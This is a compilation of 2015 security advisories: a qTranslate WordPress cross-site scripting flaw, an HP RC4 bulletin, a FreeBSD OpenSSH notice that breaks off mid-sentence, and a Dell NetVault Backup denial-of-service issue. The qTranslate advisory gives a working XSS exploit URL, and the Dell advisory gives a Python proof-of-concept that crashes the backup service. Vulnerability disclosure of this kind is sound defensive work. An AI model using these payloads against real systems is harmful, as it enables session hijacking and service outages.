Advisory ID: HTB23265Product: qTranslate WordPress pluginVendor: Qian QinVulnerable Version(s): 2.5.39 and probably priorTested Version: 2.5.39Advisory Publication: July 1, 2015 [without technical details]Vendor Notification: July 1, 2015Public Disclosure: July 29, 2015Vulnerability Type: Cross-Site Scripting [CWE-79]CVE Reference: CVE-2015-5535Risk Level: MediumCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)Discovered and Provided: High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/ )------------------------------------------------------------
-----------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in qTranslate WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against website administrators. Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application, if the victim visits a malicious page with XSS exploit. This vulnerability can also be used to perform drive-by-download or phishing attacks against website administrators.
Input passed via "edit" HTTP GET parameter to "/wp-admin/options-general.php" is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
A simple exploit below will display a JS popup with "ImmuniWeb" word:
http://wordpress/wp-admin/options-general.php?page=qtranslate&edit=%22%3E%3Cscript%3Ealert%28%2FImmuniWeb%2F%29%3B%3C%2Fscript%3E
Note: the current version of the following document is available here:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04726896
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04726896
Version: 1
HPSBGN03366 rev.1 - HP Business Process Insight with RC4 Stream Cipher,
Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-07-29
Last Updated: 2015-07-29
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Business
Process Insight.
This is the RC4 vulnerability known as the Bar Mitzvah attack, which could be
exploited remotely to allow disclosure of information.
============================================================
=================
FreeBSD-SA-15:16.openssh Security Advisory
The FreeBSD Project
Topic: OpenSSH multiple vulnerabilities
Category: contrib
Module: openssh
Announced: 2015-07-28, revised on 2015-07-30
Affects: All supported versions of FreeBSD.
Corrected: 2015-07-28 19:58:44 UTC (stable/10, 10.2-PRERELEASE)
2015-07-28 19:58:44 UTC (stable/10, 10.2-BETA2-p2)
2015-07-28 19:59:04 UTC (releng/10.2, 10.2-RC1-p1)
2015-07-28 19:59:11 UTC (releng/10.1, 10.1-RELEASE-p16)
2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)
2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)
2015-07-30 10:09:07 UTC (stable/8, 8.4-STABLE)
2015-07-30 10:09:31 UTC (releng/8.4, 8.4-RELEASE-p36)
CVE Name: CVE-2014-2653, CVE-2015-5600
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
0. Revision history
v1.0 2015-02-25 Initial release.
v1.1 2015-07-30 Revised patch for FreeBSD 8.x to address regression when
Product: Dell Netvault BackupLink: http://software.dell.com/products/netvault-backup/Vendor: DellVulnerable Version(s): 10.0.1.24 and probably priorTested Version: Version 10.0.1.24Advisory Publication: July 30, 2015Vendor Notification: January 9, 2015Public Disclosure: July 30, 2015Vulnerability Type: Remote Denial of serviceCVE Reference: CVE-2015-5696Risk Level: MediumDiscovered and Provided: Josep Pi Rodriguez https://es.linkedin.com/pub/josep-pi-rodriguez/60/229/b24------------------------------------------------------------
------------
-----------------------
Advisory Details:
Doing reverse engineering of the protocol was found several ways to cause a crash in the nvpmgr.exe process.The entire application (all processes) will die and it won't be able to restart again by itself unless someone do it manually.
Proof of concept script:
#!/usr/bin/python
import socket as so
from struct import *
server = "192.168.140.130"
port = 20031
d = "\x18\x00\x00\x00"
d += "\x01"
#d += "\xCB\x22\x77\xC9" # Another crash example
d += "\x18\xE8\xBE\xC8" # Will cause the crash
d += "\x0B\x00\x00\x00" + "AAAA" + "B" * 6
d += "\x00" # null byte
##
# send it
s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send(d)
s.close()
------------------------------------------------------------------------
-----------------------
Solution:
Disclosure timeline:
2015-01-09 Vendor notified via email
2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x
2015-07-30 Public disclosure.
The fix done by Dell was not checked by the researcher.
------------------------------------------------------------------------
-----------------------
